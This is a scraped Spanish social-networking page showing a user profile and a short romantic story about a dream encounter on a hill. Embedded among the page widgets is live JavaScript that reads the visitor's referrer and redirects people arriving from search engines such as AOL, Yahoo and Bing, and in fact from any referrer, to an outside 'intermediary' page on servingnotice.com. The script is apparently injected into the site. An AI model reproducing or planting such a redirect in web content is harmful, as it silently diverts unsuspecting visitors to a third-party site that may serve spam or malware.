Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
130.471
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;
Cursos, Masters y Oposiciones
Las mejores inocentadas para el 28 de diciembre
 

GolDs^HaiR

GolDs^HaiR  
28
Terrassa (BCN)  
   

Historia

La Colina
[08-12-2010 12:15]

Era verano de 1998, hacía un calor muy agradable. Decidí ir a una colina en la que me siento muy agusto y hay un paisaje precioso.
Me senté al lado de un árbol, con mi mano rozaba la hierba y olia el suave aroma que traia la brisa de las flores.
Todo estaba muy tranquilo, cuando de golpe se oyeron moverse unos matorrales, la verdad es que me asusté un poco, pues allí nunca pasaba nadie. De golpe de entre la nada, apareció un chico que se dirijia hacia donde estaba yo, queria salir corriendo pero algo me dijo que ese chico estaba allí por mí.
Sin decir nada, se sentó a mi lado y me dijo: -¿Bonito dia verdad?., yo callada y bastante roja de tener un chico tan apuesto a mi lado..le dije que sí con la cabeza, sonrió un poco y me dijo su nombre, Alexander, pero me dijo que le llamara Alex. Cuando fui a decirle mi nombre, me pidió que no lo hiciera, queria guardarse esa incognita, y pues aun sin entenderlo, respeté su decisión.
Empezamos ha hablar y conectamos muy bien, parecia 'echo a mi medida', era perfecto desde mi punto de vista, me miraba con una mirada intensa y dulce, con esos ojos azul cielo. Cuanto más rato pasaba, más cosquilleo sentia en mi estomago. Se hizo de noche, me quedé dormida a su lado, y cuando desperté él no estaba, todo parecia haber sido un sueño, pero preferia pensar que no lo era. Me tumbé, y miraba hacia el cielo que estaba muy despejado, me recordaba a sus ojos. Cerré los mios en un suspiro, y al abrirlos estaba de nuevo sentado a mi lado, le sonreí, sin pensar en como ni cuando habia llegado.
Ya era la puesta de sol del atardecer, me cogió la mano, me levantó, y sin decir nada me besó. Creí que ya iba siendo hora de decirle mi nombre, y cuando por segunda vez fuí a decirselo, puso su dedo en mis labios, sonrió..y en ese mismo instante..yo me desperté.


Compártelo:

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda